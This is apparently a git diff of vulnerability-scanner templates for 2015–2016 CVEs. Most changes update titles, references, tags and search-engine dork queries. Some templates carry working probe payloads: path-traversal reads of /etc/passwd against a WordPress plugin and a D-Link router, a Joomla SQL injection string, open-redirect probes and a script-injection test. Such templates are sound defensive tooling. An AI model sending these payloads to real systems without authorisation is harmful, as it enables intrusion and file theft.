+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2015-5354
+    cwe-id: CWE-601
+  tags: packetstorm,cve,cve2015,redirect,novius
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/novius-os/admin/nos/login?redirect=http://interact.sh'
+
+    matchers:
+      - type: regex
+        part: header
+        regex:
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+
+# Enhanced by mp on 2022/07/22
diff --git a/cves/2015/CVE-2015-5461.yaml b/cves/2015/CVE-2015-5461.yaml
index b6140bbf57..5c54d1362f 100644
--- a/cves/2015/CVE-2015-5461.yaml
+++ b/cves/2015/CVE-2015-5461.yaml
@@ -8,17 +8,21 @@ info:
   reference:
     - https://wpscan.com/vulnerability/afc0d5b5-280f-424f-bc3e-d04452e56e16
     - https://nvd.nist.gov/vuln/detail/CVE-2015-5461
+    - https://wordpress.org/plugins/stageshow/changelog/
+    - http://seclists.org/fulldisclosure/2015/Jul/27
   classification:
     cve-id: CVE-2015-5461
-  tags: redirect,cve,cve2015,wordpress,wp-plugin
+  metadata:
+    google-query: inurl:"/wp-content/plugins/stageshow/"
+  tags: wpscan,seclists,redirect,cve,cve2015,wordpress,wp-plugin
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Fexample.com"
+      - "{{BaseURL}}/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Finteract.sh"
 
     matchers:
       - type: regex
         regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
         part: header
diff --git a/cves/2015/CVE-2015-5469.yaml b/cves/2015/CVE-2015-5469.yaml
new file mode 100644
index 0000000000..e62b890c74
--- /dev/null
+++ b/cves/2015/CVE-2015-5469.yaml
@@ -0,0 +1,33 @@
+id: CVE-2015-5469
+info:
+  name: Wordpress MDC YouTube Downloader plugin v2.1.0 - Remote file download
+  author: 0x_Akoko
+  severity: high
+  description: Absolute path traversal vulnerability in the MDC YouTube Downloader plugin 2.1.0 for WordPress allows remote attackers to read arbitrary files via a full pathname in the file parameter to includes/download.php.
+  reference:
+    - https://www.openwall.com/lists/oss-security/2015/07/10/5
+    - https://www.cvedetails.com/cve/CVE-2015-5469/
+    - http://www.vapid.dhs.org/advisory.php?v=133
+    - http://www.openwall.com/lists/oss-security/2015/07/10/5
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2015-5469
+    cwe-id: CWE-22
+  tags: cve,cve2015,wp,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2015/CVE-2015-5471.yaml b/cves/2015/CVE-2015-5471.yaml
index 25e4883dfb..e59da8f5da 100644
--- a/cves/2015/CVE-2015-5471.yaml
+++ b/cves/2015/CVE-2015-5471.yaml
@@ -9,13 +9,16 @@ info:
     - https://wpscan.com/vulnerability/b00d9dda-721d-4204-8995-093f695c3568
     - http://www.vapid.dhs.org/advisory.php?v=134
     - https://nvd.nist.gov/vuln/detail/CVE-2015-5471
+    - http://packetstormsecurity.com/files/132653/WordPress-WP-SwimTeam-1.44.10777-Arbitrary-File-Download.html
+  remediation: Upgrade to Swim Team version 1.45 or newer.
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 5.3
     cve-id: CVE-2015-5471
     cwe-id: CWE-22
-  remediation: Upgrade to Swim Team version 1.45 or newer.
-  tags: cve,cve2015,wordpress,wp-plugin,lfi
+  metadata:
+    google-query: inurl:"/wp-content/plugins/wp-swimteam"
+  tags: cve,cve2015,wordpress,wp-plugin,lfi,wpscan,packetstorm
 
 requests:
   - method: GET
diff --git a/cves/2015/CVE-2015-5531.yaml b/cves/2015/CVE-2015-5531.yaml
index 625872fd17..5b2fae0e33 100644
--- a/cves/2015/CVE-2015-5531.yaml
+++ b/cves/2015/CVE-2015-5531.yaml
@@ -1,16 +1,18 @@
 id: CVE-2015-5531
 
 info:
-  name: ElasticSearch directory traversal vulnerability (CVE-2015-5531)
+  name: ElasticSearch <1.6.1 - Local File Inclusion
   author: princechaddha
   severity: high
-  description: Directory traversal vulnerability in Elasticsearch before 1.6.1 allows remote attackers to read arbitrary files via unspecified vectors related to snapshot API calls.
+  description: ElasticSearch before 1.6.1 allows remote attackers to read arbitrary files via unspecified vectors related to snapshot API calls.
   reference:
     - https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-5531
     - https://nvd.nist.gov/vuln/detail/CVE-2015-5531
+    - http://packetstormsecurity.com/files/132721/Elasticsearch-Directory-Traversal.html
+    - https://www.elastic.co/community/security/
   classification:
     cve-id: CVE-2015-5531
-  tags: cve,cve2015,elasticsearch
+  tags: vulhub,packetstorm,cve,cve2015,elasticsearch
 
 requests:
   - raw:
@@ -53,3 +55,5 @@ requests:
       - type: status
         status:
           - 400
+
+# Enhanced by mp on 2022/06/08
diff --git a/cves/2015/CVE-2015-5688.yaml b/cves/2015/CVE-2015-5688.yaml
index 55e9b3a63c..f4dac34607 100644
--- a/cves/2015/CVE-2015-5688.yaml
+++ b/cves/2015/CVE-2015-5688.yaml
@@ -1,13 +1,15 @@
 id: CVE-2015-5688
 
 info:
-  name: Geddy before v13.0.8 LFI
+  name: Geddy <13.0.8 - Local File Inclusion
   author: pikpikcu
   severity: high
-  description: Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the PATH_INFO to the default URI.
+  description: Geddy prior to version 13.0.8 contains a directory traversal vulnerability in lib/app/index.js  that allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the PATH_INFO to the default URI.
   reference:
     - https://nodesecurity.io/advisories/geddy-directory-traversal
     - https://github.com/geddy/geddy/issues/697
+    - https://github.com/geddy/geddy/commit/2de63b68b3aa6c08848f261ace550a37959ef231
+    - https://nvd.nist.gov/vuln/detail/CVE-2015-5688
   classification:
     cve-id: CVE-2015-5688
   tags: cve,cve2015,geddy,lfi
@@ -27,3 +29,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/08
diff --git a/cves/2015/CVE-2015-6477.yaml b/cves/2015/CVE-2015-6477.yaml
index ec71bd0334..a14472ddd7 100644
--- a/cves/2015/CVE-2015-6477.yaml
+++ b/cves/2015/CVE-2015-6477.yaml
@@ -1,17 +1,17 @@
 id: CVE-2015-6477
 
 info:
-  name: Nordex NC2 'username' Parameter XSS
+  name: Nordex NC2  - Cross-Site Scripting
   author: geeknik
   severity: medium
-  description: An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  description: Nordex NC2 contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
   reference:
     - https://seclists.org/fulldisclosure/2015/Dec/117
     - https://ics-cert.us-cert.gov/advisories/ICSA-15-286-01
     - https://nvd.nist.gov/vuln/detail/CVE-2015-6477
   classification:
     cve-id: CVE-2015-6477
-  tags: cve,cve2015,xss,iot,nordex,nc2
+  tags: xss,iot,nordex,nc2,seclists,cve,cve2015
 
 requests:
   - method: POST
@@ -30,3 +30,5 @@ requests:
         part: body
         words:
           - "</script><script>alert('{{randstr}}')</script>"
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2015/CVE-2015-6544.yaml b/cves/2015/CVE-2015-6544.yaml
index 2babac827a..61f14ea40b 100644
--- a/cves/2015/CVE-2015-6544.yaml
+++ b/cves/2015/CVE-2015-6544.yaml
@@ -1,12 +1,15 @@
 id: CVE-2015-6544
 
 info:
-  name: iTop XSS
+  name: Combodo iTop <2.2.0-2459 - Cross-Site Scripting
   author: pikpikcu
   severity: medium
   description: |
-    Cross-site scripting (XSS) vulnerability in application/dashboard.class.inc.php in Combodo iTop before 2.2.0-2459 allows remote attackers to inject arbitrary web script or HTML via a dashboard title.
+    Combodo iTop before 2.2.0-2459 contains a cross-site scripting vulnerability in application/dashboard.class.inc.php which allows remote attackers to inject arbitrary web script or HTML via a dashboard title.
   reference:
+    - https://www.htbridge.com/advisory/HTB23268
+    - http://sourceforge.net/p/itop/tickets/1114/
+    - http://sourceforge.net/p/itop/code/3662/
     - https://nvd.nist.gov/vuln/detail/CVE-2015-6544
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@@ -35,3 +38,5 @@ requests:
         part: header
         words:
           - text/html
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2015/CVE-2015-6920.yaml b/cves/2015/CVE-2015-6920.yaml
index 8646c46d41..473b0a70fd 100644
--- a/cves/2015/CVE-2015-6920.yaml
+++ b/cves/2015/CVE-2015-6920.yaml
@@ -1,16 +1,17 @@
 id: CVE-2015-6920
 
 info:
-  name: sourceAFRICA <= 0.1.3 - Unauthenticated Cross-Site Scripting (XSS)
+  name: WordPress sourceAFRICA <=0.1.3 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: WordPress sourceAFRICA plugin version 0.1.3 suffers from a cross site scripting vulnerability.
+  description: WordPress sourceAFRICA plugin version 0.1.3 contains a cross-site scripting vulnerability.
   reference:
-    - https://packetstormsecurity.com/files/133371/
+    - http://packetstormsecurity.com/files/133371/WordPress-sourceAFRICA-0.1.3-Cross-Site-Scripting.html
+    - https://wpvulndb.com/vulnerabilities/8169
     - https://nvd.nist.gov/vuln/detail/CVE-2015-6920
   classification:
     cve-id: CVE-2015-6920
-  tags: cve,cve2015,wordpress,wp-plugin,xss
+  tags: wp-plugin,xss,packetstorm,cve,cve2015,wordpress
 
 requests:
   - method: GET
@@ -32,3 +33,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2015/CVE-2015-7245.yaml b/cves/2015/CVE-2015-7245.yaml
new file mode 100644
index 0000000000..8232e6846b
--- /dev/null
+++ b/cves/2015/CVE-2015-7245.yaml
@@ -0,0 +1,32 @@
+id: CVE-2015-7245
+
+info:
+  name: D-Link DVG-N5402SP - Path Traversal
+  author: 0x_Akoko
+  severity: high
+  description: |
+    Directory traversal vulnerability in D-Link DVG-N5402SP with firmware W1000CN-00, W1000CN-03, or W2000EN-00 allows remote attackers to read sensitive information via a .. (dot dot) in the errorpage parameter.
+  reference:
+    - https://packetstormsecurity.com/files/135590/D-Link-DVG-N5402SP-Path-Traversal-Information-Disclosure.html
+    - https://www.exploit-db.com/exploits/39409/
+    - https://nvd.nist.gov/vuln/detail/CVE-2015-7245
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2015-7245
+    cwe-id: CWE-22
+  tags: cve,cve2015,dlink,lfi,packetstorm,edb
+
+requests:
+  - raw:
+      - |
+        POST /cgibin/webproc HTTP/1.1
+        Host: {{Hostname}}
+
+        getpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/passwd&var%3Amenu=setup&var%3Apage=connected&var%&objaction=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh
+
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
diff --git a/cves/2015/CVE-2015-7297.yaml b/cves/2015/CVE-2015-7297.yaml
index 0080e52970..d6bcf99033 100644
--- a/cves/2015/CVE-2015-7297.yaml
+++ b/cves/2015/CVE-2015-7297.yaml
@@ -1,26 +1,30 @@
 id: CVE-2015-7297
 
 info:
-  name: Joomla Core SQL Injection
+  name: Joomla! Core SQL Injection
   author: princechaddha
   severity: high
-  description: A SQL injection vulnerability in Joomla 3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands.
+  description: A SQL injection vulnerability in Joomla! 3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2015-7297
     - http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html
+    - https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/
   classification:
     cve-id: CVE-2015-7297
   tags: cve,cve2015,joomla,sqli
 
+variables:
+  num: "999999999"
+
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5(8888)),1)"
+      - "{{BaseURL}}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5({{num}})),1)"
 
     matchers:
       - type: word
         words:
-          - "cf79ae6addba60ad018347359bd144d2"
+          - '{{md5({{num}})}}'
         part: body
 
 # Enhanced by mp on 2022/03/02
diff --git a/cves/2015/CVE-2015-7377.yaml b/cves/2015/CVE-2015-7377.yaml
index 04ab4ee892..cb6e058ee7 100644
--- a/cves/2015/CVE-2015-7377.yaml
+++ b/cves/2015/CVE-2015-7377.yaml
@@ -1,16 +1,18 @@
 id: CVE-2015-7377
 
 info:
-  name: Pie-Register <= 2.0.18 - Unauthenticated Reflected Cross-Site Scripting (XSS)
+  name: WordPress Pie-Register <2.0.19 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: Cross-site scripting (XSS) vulnerability in pie-register/pie-register.php in the Pie Register plugin before 2.0.19 for WordPress allows remote attackers to inject arbitrary web script or HTML via the invitaion_code parameter in a pie-register page to the default URI.
+  description: WordPress Pie Register before 2.0.19 contains a reflected cross-site scripting vulnerability in pie-register/pie-register.php which allows remote attackers to inject arbitrary web script or HTML via the invitaion_code parameter in a pie-register page to the default URL.
   reference:
     - https://packetstormsecurity.com/files/133928/WordPress-Pie-Register-2.0.18-Cross-Site-Scripting.html
+    - https://github.com/GTSolutions/Pie-Register/blob/2.0.19/readme.txt
     - https://nvd.nist.gov/vuln/detail/CVE-2015-7377
+    - http://packetstormsecurity.com/files/133928/WordPress-Pie-Register-2.0.18-Cross-Site-Scripting.html
   classification:
     cve-id: CVE-2015-7377
-  tags: cve,cve2015,wordpress,wp-plugin,xss
+  tags: cve2015,wordpress,wp-plugin,xss,packetstorm,cve
 
 requests:
   - method: GET
@@ -32,3 +34,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2015/CVE-2015-7450.yaml b/cves/2015/CVE-2015-7450.yaml
index e484558c5d..feebde88db 100644
--- a/cves/2015/CVE-2015-7450.yaml
+++ b/cves/2015/CVE-2015-7450.yaml
@@ -4,17 +4,20 @@ info:
   name: IBM WebSphere Java Object Deserialization - Remote Code Execution
   author: wdahlenb
   severity: critical
-  description: "IBM Websphere Application Server 7, 8, and 8.5 have a deserialization vulnerability in the SOAP Connector (port 8880 by default)."
+  description: IBM Websphere Application Server 7, 8, and 8.5 have a deserialization vulnerability in the SOAP Connector (port 8880 by default).
   reference:
     - https://github.com/Coalfire-Research/java-deserialization-exploits/blob/main/WebSphere/websphere_rce.py
     - https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
     - https://nvd.nist.gov/vuln/detail/CVE-2015-7450
+    - http://www-01.ibm.com/support/docview.wss?uid=swg21972799
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2015-7450
     cwe-id: CWE-94
-  tags: cve,cve2015,websphere,deserialization,rce,oast,ibm,java
+  metadata:
+    shodan-query: http.html:"IBM WebSphere Portal"
+  tags: cve,cve2015,websphere,deserialization,rce,oast,ibm,java,kev
 
 requests:
   - raw:
diff --git a/cves/2015/CVE-2015-7780.yaml b/cves/2015/CVE-2015-7780.yaml
index 79d7d4a33a..5286df5caf 100644
--- a/cves/2015/CVE-2015-7780.yaml
+++ b/cves/2015/CVE-2015-7780.yaml
@@ -1,19 +1,22 @@
 id: CVE-2015-7780
 
 info:
-  name: ManageEngine Firewall Analyzer 8.0 - Directory Traversal
+  name: ManageEngine Firewall Analyzer <8.0 - Local File Inclusion
   author: daffainfo
   severity: medium
-  description: Directory traversal vulnerability in ManageEngine Firewall Analyzer before 8.0.
+  description: ManageEngine Firewall Analyzer before 8.0 is vulnerable to local file inclusion.
   reference:
     - https://www.exploit-db.com/exploits/35933
     - https://www.cvedetails.com/cve/CVE-2015-7780/
+    - http://jvndb.jvn.jp/ja/contents/2015/JVNDB-2015-000185.html
+    - http://jvn.jp/en/jp/JVN21968837/index.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2015-7780
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 6.5
     cve-id: CVE-2015-7780
     cwe-id: CWE-22
-  tags: cve,cve2015,lfi,manageengine
+  tags: manageengine,edb,cve,cve2015,lfi
 
 requests:
   - method: GET
@@ -37,3 +40,5 @@ requests:
         part: header
         words:
           - "application/xml"
+
+# Enhanced by mp on 2022/07/22
diff --git a/cves/2015/CVE-2015-7823.yaml b/cves/2015/CVE-2015-7823.yaml
index 84db6c7341..5df9229ec3 100644
--- a/cves/2015/CVE-2015-7823.yaml
+++ b/cves/2015/CVE-2015-7823.yaml
@@ -8,17 +8,18 @@ info:
   reference:
     - https://packetstormsecurity.com/files/133981/Kentico-CMS-8.2-Cross-Site-Scripting-Open-Redirect.html
     - https://nvd.nist.gov/vuln/detail/CVE-2015-7823
+    - http://packetstormsecurity.com/files/133981/Kentico-CMS-8.2-Cross-Site-Scripting-Open-Redirect.html
   classification:
     cve-id: CVE-2015-7823
-  tags: cve,cve2015,kentico,redirect
+  tags: cve,cve2015,kentico,redirect,packetstorm
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/CMSPages/GetDocLink.ashx?link=https://example.com/"
+      - "{{BaseURL}}/CMSPages/GetDocLink.ashx?link=https://interact.sh/"
 
     matchers:
       - type: regex
         regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
         part: header
diff --git a/cves/2015/CVE-2015-8349.yaml b/cves/2015/CVE-2015-8349.yaml
index 3f57ae24be..306f594c2f 100644
--- a/cves/2015/CVE-2015-8349.yaml
+++ b/cves/2015/CVE-2015-8349.yaml
@@ -1,11 +1,13 @@
 id: CVE-2015-8349
 
 info:
-  name: SourceBans XSS
+  name: SourceBans <2.0 - Cross-Site Scripting
   author: pikpikcu
   severity: medium
-  description: Cross-site scripting (XSS) vulnerability in SourceBans before 2.0 pre-alpha allows remote attackers to inject arbitrary web script or HTML via the advSearch parameter to index.php.
+  description: SourceBans before 2.0 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the advSearch parameter to index.php.
   reference:
+    - https://www.htbridge.com/advisory/HTB23273
+    - http://web.archive.org/web/20201207072921/https://www.securityfocus.com/archive/1/537018/100/0/threaded
     - https://nvd.nist.gov/vuln/detail/CVE-2015-8349
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@@ -34,3 +36,5 @@ requests:
         part: header
         words:
           - text/
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2015/CVE-2015-8399.yaml b/cves/2015/CVE-2015-8399.yaml
index 6a968d2505..9125c4579f 100644
--- a/cves/2015/CVE-2015-8399.yaml
+++ b/cves/2015/CVE-2015-8399.yaml
@@ -7,6 +7,8 @@ info:
   description: Atlassian Confluence before 5.8.17 allows remote authenticated users to read configuration files via the decoratorName parameter to (1) spaces/viewdefaultdecorator.action or (2) admin/viewdefaultdecorator.action.
   reference:
     - https://jira.atlassian.com/browse/CONFSERVER-39704?src=confmacro
+    - https://www.exploit-db.com/exploits/39170/
+    - http://web.archive.org/web/20201209041130/https://www.securityfocus.com/archive/1/537232/100/0/threaded
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 4.3
@@ -14,7 +16,7 @@ info:
     cwe-id: CWE-200
   metadata:
     shodan-query: http.component:"Atlassian Confluence"
-  tags: cve,cve2015,atlassian,confluence
+  tags: edb,cve,cve2015,atlassian,confluence
 
 requests:
   - method: GET
diff --git a/cves/2015/CVE-2015-8813.yaml b/cves/2015/CVE-2015-8813.yaml
index 01ed86a7ec..6bbb0c5228 100644
--- a/cves/2015/CVE-2015-8813.yaml
+++ b/cves/2015/CVE-2015-8813.yaml
@@ -1,13 +1,15 @@
 id: CVE-2015-8813
 
 info:
-  name: Umbraco SSRF Vulnerability in Feedproxy.aspx
+  name: Umbraco <7.4.0- Server-Side Request Forgery
   author: emadshanab
   severity: high
-  description: A Server Side Request Forgery (SSRF) vulnerability in Umbraco in Feedproxy.aspx allows attackers to send arbitrary HTTP GET requests.Once you change the URL to the http://local/Umbraco/feedproxy.aspx?url=http://127.0.0.1:80/index, you able to access the localhost application of the server
+  description: Umbraco before version 7.4.0 contains a server-side request forgery vulnerability in feedproxy.aspx that allows attackers to send arbitrary HTTP GET requests via http://local/Umbraco/feedproxy.aspx?url=http://127.0.0.1:80/index.
   reference:
     - https://blog.securelayer7.net/umbraco-the-open-source-asp-net-cms-multiple-vulnerabilities/
     - https://nvd.nist.gov/vuln/detail/CVE-2015-8813
+    - https://github.com/umbraco/Umbraco-CMS/commit/924a016ffe7ae7ea6d516c07a7852f0095eddbce
+    - http://www.openwall.com/lists/oss-security/2016/02/18/8
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N
     cvss-score: 8.2
@@ -25,3 +27,5 @@ requests:
         part: interactsh_protocol  # Confirms the HTTP Interaction
         words:
           - "http"
+
+# Enhanced by mp on 2022/06/08
diff --git a/cves/2015/CVE-2015-9414.yaml b/cves/2015/CVE-2015-9414.yaml
index 3c302799b8..1fc165349d 100644
--- a/cves/2015/CVE-2015-9414.yaml
+++ b/cves/2015/CVE-2015-9414.yaml
@@ -1,19 +1,23 @@
 id: CVE-2015-9414
 
 info:
-  name: WP Symposium <= 15.8.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
+  name: WordPress Symposium <=15.8.1 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: The wp-symposium plugin through 15.8.1 for WordPress has XSS via the wp-content/plugins/wp-symposium/get_album_item.php?size parameter.
+  description: WordPress Symposium through 15.8.1 contains a reflected cross-site scripting vulnerability via the wp-content/plugins/wp-symposium/get_album_item.php?size parameter which allows an attacker to steal cookie-based authentication credentials and launch other attacks.
   reference:
     - https://wpscan.com/vulnerability/2ac2d43f-bf3f-4831-9585-5c5484051095
+    - https://wpvulndb.com/vulnerabilities/8175
+    - https://wordpress.org/plugins/wp-symposium/#developers
     - https://nvd.nist.gov/vuln/detail/CVE-2015-9414
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2015-9414
     cwe-id: CWE-79
-  tags: cve,cve2015,wordpress,wp-plugin,xss
+  metadata:
+    google-query: inurl:"/wp-content/plugins/wp-symposium"
+  tags: xss,wpscan,cve,cve2015,wordpress,wp-plugin
 
 requests:
   - method: GET
@@ -35,3 +39,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2015/CVE-2015-9480.yaml b/cves/2015/CVE-2015-9480.yaml
index ac300031f7..8a5c211e3d 100644
--- a/cves/2015/CVE-2015-9480.yaml
+++ b/cves/2015/CVE-2015-9480.yaml
@@ -13,7 +13,9 @@ info:
     cvss-score: 7.5
     cve-id: CVE-2015-9480
     cwe-id: CWE-22
-  tags: cve,cve2015,wordpress,wp-plugin,lfi
+  metadata:
+    google-query: inurl:"/wp-content/plugins/robotcpa"
+  tags: wp-plugin,lfi,edb,cve,cve2015,wordpress
 
 requests:
   - method: GET
diff --git a/cves/2016/CVE-2016-0957.yaml b/cves/2016/CVE-2016-0957.yaml
index c4aeae7709..7635d227b6 100644
--- a/cves/2016/CVE-2016-0957.yaml
+++ b/cves/2016/CVE-2016-0957.yaml
@@ -1,16 +1,20 @@
 id: CVE-2016-0957
 
 info:
-  name: Adobe AEM Console Disclosure
+  name: Adobe AEM Dispatcher <4.15 - Rules Bypass
   author: geeknik
   severity: high
   description: Dispatcher before 4.1.5 in Adobe Experience Manager 5.6.1, 6.0.0, and 6.1.0 does not properly implement a URL filter, which allows remote attackers to bypass dispatcher rules via unspecified vectors.
   reference:
     - https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html
+    - https://helpx.adobe.com/security/products/experience-manager/apsb16-05.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2016-0957
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2016-0957
+  metadata:
+    shodan-query: http.component:"Adobe Experience Manager"
   tags: cve,cve2016,adobe,aem
 
 requests:
@@ -31,3 +35,5 @@ requests:
           - "java.lang"
           - "(Runtime)"
         condition: and
+
+# Enhanced by mp on 2022/06/08
diff --git a/cves/2016/CVE-2016-1000126.yaml b/cves/2016/CVE-2016-1000126.yaml
index a9e7779769..fbf986d1c7 100644
--- a/cves/2016/CVE-2016-1000126.yaml
+++ b/cves/2016/CVE-2016-1000126.yaml
@@ -1,17 +1,22 @@
 id: CVE-2016-1000126
 
 info:
-  name: Admin Font Editor <= 1.8 - Reflected Cross-Site Scripting (XSS)
+  name: WordPress Admin Font Editor <=1.8 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: Reflected XSS in wordpress plugin admin-font-editor v1.8
+  description: WordPress Admin Font Editor 1.8 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
   reference:
+    - http://www.vapidlabs.com/wp/wp_advisory.php?v=526
+    - https://wordpress.org/plugins/admin-font-editor
+    - http://web.archive.org/web/20210123183728/https://www.securityfocus.com/bid/93896/
     - https://nvd.nist.gov/vuln/detail/CVE-2016-1000126
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2016-1000126
     cwe-id: CWE-79
+  metadata:
+    google-query: inurl:"/wp-content/plugins/admin-font-editor"
   tags: cve,cve2016,wordpress,xss,wp-plugin
 
 requests:
@@ -34,3 +39,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2016/CVE-2016-1000127.yaml b/cves/2016/CVE-2016-1000127.yaml
index 4dbc7babae..cb97df8ff2 100644
--- a/cves/2016/CVE-2016-1000127.yaml
+++ b/cves/2016/CVE-2016-1000127.yaml
@@ -1,11 +1,14 @@
 id: CVE-2016-1000127
 
 info:
-  name: AJAX Random Post <= 2.00 - Reflected Cross-Site Scripting (XSS)
+  name: WordPress AJAX Random Post <=2.00 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: Reflected XSS in wordpress plugin ajax-random-post v2.00
+  description: WordPress AJAX Random Post 2.00 is vulnerable to reflected cross-site scripting.
   reference:
+    - http://www.vapidlabs.com/wp/wp_advisory.php?v=494
+    - https://wordpress.org/plugins/ajax-random-post
+    - http://web.archive.org/web/20210614214105/https://www.securityfocus.com/bid/93895
     - https://nvd.nist.gov/vuln/detail/CVE-2016-1000127
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@@ -34,3 +37,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/05
diff --git a/cves/2016/CVE-2016-1000128.yaml b/cves/2016/CVE-2016-1000128.yaml
index b824ab00f2..d2284111d6 100644
--- a/cves/2016/CVE-2016-1000128.yaml
+++ b/cves/2016/CVE-2016-1000128.yaml
@@ -1,18 +1,21 @@
 id: CVE-2016-1000128
 
 info:
-  name: anti-plagiarism <= 3.60 - Reflected Cross-Site Scripting (XSS)
+  name: WordPress anti-plagiarism <=3.60 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: Reflected XSS in wordpress plugin anti-plagiarism v3.60
+  description: WordPress anti-plagiarism 3.6.0 and prior are vulnerable to reflected cross-site scripting.
   reference:
     - http://www.vapidlabs.com/wp/wp_advisory.php?v=161
     - https://wordpress.org/plugins/anti-plagiarism
